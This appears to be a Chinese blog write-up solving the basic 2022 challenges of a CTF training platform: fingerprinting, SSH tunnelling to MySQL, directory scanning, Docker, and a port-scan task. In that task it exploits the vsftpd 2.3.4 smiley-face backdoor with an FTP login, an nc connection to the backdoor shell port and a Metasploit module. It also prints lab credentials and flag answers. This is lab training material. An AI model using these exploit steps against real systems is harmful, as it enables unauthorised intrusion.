安鸾之2022新增基础题
涂寐 Lv5

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
本文首发于 涂寐’s Blogshttps://0xtlu.github.io/article/c4da1970.html

指纹识别

1
2
3
4
5
6
7
8
9
指纹识别
题目URL:http://47.100.220.113:8009/

whatweb安装
apt-get update
apt-get install whatweb

》》whatweb http://47.100.220.113:8009/
》》flag{de6de75989416f33c0bdf18ccd83127c}

image

Linux基础命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
Linux基础命令

IP:47.100.220.113
SSH端口:2233
SSH用户:test
SSH密码:whalwl@wuhan

flag自己找,没提示!

》》find / -name *flag*
》》cat /home/test/.this_is_flag
》》#九阴真经上卷:
》》flag{82782fd750080718
》》tips:九阴真经下卷文件名包含: Jiuyin-Sutra-Volume-2
》》find / -name *Jiuyin-Sutra-Volume-2*
》》cat /usr/games/.Jiuyin-Sutra-Volume-2
》》#九阴真经下卷
》》71ad76e3a8b8794d}
》》flag{82782fd75008071871ad76e3a8b8794d}

image

Mysql数据库基础

1
2
3
4
5
6
7
8
9
10
11
Mysql数据库基础
IP:47.100.220.113
SSH端口:2244
SSH账户:test
SSH密码:whalwl@wuhan

Mysql主机名:mysql
Mysql用户名:test
Mysql密码:test

题目没提示,自己研究!
1
2
3
4
》》配一份讲解:https://blog.csdn.net/ory001/article/details/115172944
》》Navicat使用SSH隧道连接MySQL
》》新建数据库连接中分别在常规和SSH中填入官方提供的内容
》》flag{0dd93bed6d72ee25d2f75ce3553a4fb7}

image
image

手工SSH隧道转发

1
2
3
4
5
6
7
8
9
10
11
12
13
》》需要了解SSH中的本地端口转发
》》配给一份很棒的文章:https://www.zsythink.net/archives/2450
》》-L localport:remotehost:remoteport
》》将本地机(客户机)的某个端口转发到远端指定机器的指定端口
》》-f
》》要求 ssh 在执行命令前退至后台
》》-N
》》不执行远程命令,仅使用端口转发
》》ssh -L 6666:mysql:3306 -N -f test@47.100.220.113 -p 2244
》》mysql -u test -P 6666 -p
》》show databases;
》》show tables from whalwl;
》》select * from whalwl.flag;

image
image

目录扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
目录扫描
URL:http://47.100.220.113:8008/

dirsearch工具使用示例:
python dirsearch.py -u http://47.100.220.113:8008/ -w dicc.txt -e php -t 1 -m head

说明:
使用dirsearch一定要用-m参数指定head扫描,使用其他工具也一样,服务器刚不住!!!
dicc.txt b290cf8531865db093b68ffe742d1ba0

》》使用目录扫描工具+官方提供的字典
》》dirb工具,这个界面不好看
》》dirb http://47.100.220.113:8008/ ./dicc.txt
》》
》》dirsearch工具,好分辨扫描到的目录
》》dirsearch -u http://47.100.220.113:8008/ -w /home/kali/Test/dicc.txt -e php -t 1 -m head
》》 unzip web.zip -d web
》》cat web/this_is_flag_c8b2a7b37ceca919d1ab99e1a319552c
》》
》》一些图形化工具:御剑啥的。
》》
》》目录扫描……看你的字典是否够强大吧

image
image
image

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
端口扫描
题目考察:nmap端口扫描练习及经典的笑脸后门利用
服务版本识别:nmap -p 10021 -sV 47.100.220.113

ftp端口10021 对应后门端口16200
ftp端口20021 对应后门端口26200
ftp端口30021 对应后门端口36200

》》-sV 探测服务/版本信息
》》-A 全检测,即启动Os检测,版本检测,脚本扫描和traceroute
》》-Pn 将所有主机视为在在线,跳过主机发现
》》nmap -p 10021 -Pn -sV 47.100.220.113
》》nmap -p 30021 -A -Pn 47.100.220.113
》》10021/tcp open ftp vsftpd 2.3.4 Service Info: OS: Unix
》》20021/tcp open ftp vsftpd 2.3.4 Service Info: OS: Unix
》》30021/tcp open ftp vsftpd 2.3.4 Service Info: OS: Unix
》》
》》某个终端:连接接ftp服务,并写入笑脸
》》ftp 47.100.220.113 10021
》》libai:)
》》任意密码
》》
》》另一终端:;使用nc侦听连接shell
》》nc 47.100.220.113 16200
》》ls
》》cat this_is_flag
》》flag{ff5c1e67567b60f9086805e3b44e5ccd}
》》
》》MSF利用
》》msfconsole
》》search vsftpd
》》use exploit/unix/ftp/vsftpd_234_backdoor
》》show options
》》set rhosts 47.100.220.113
》》set rport 10021
》》run
》》无法返回shell终端,故需要进行下一步,手速快,新终端:
》》nc 47.100.220.113 16200

image
image

Docker容器基础

1
2
3
4
5
6
7
8
9
10
11
12
13
Docker容器基础
镜像仓库地址:
registry.cn-shanghai.aliyuncs.com/whalwl/docker_test

运行该镜像,进入容器获取flag

》》docker pull registry.cn-shanghai.aliyuncs.com/whalwl/docker_test
》》docker images
》》docker run -itd -P registry.cn-shanghai.aliyuncs.com/whalwl/docker_test
》》docker exec -it e02c00b4f6f3 /bin/bash
》》find / -name *flag*
》》cat /root/this_is_flag
》》flag{942b12e7501e80ce0ae708027d974982}

image

 评论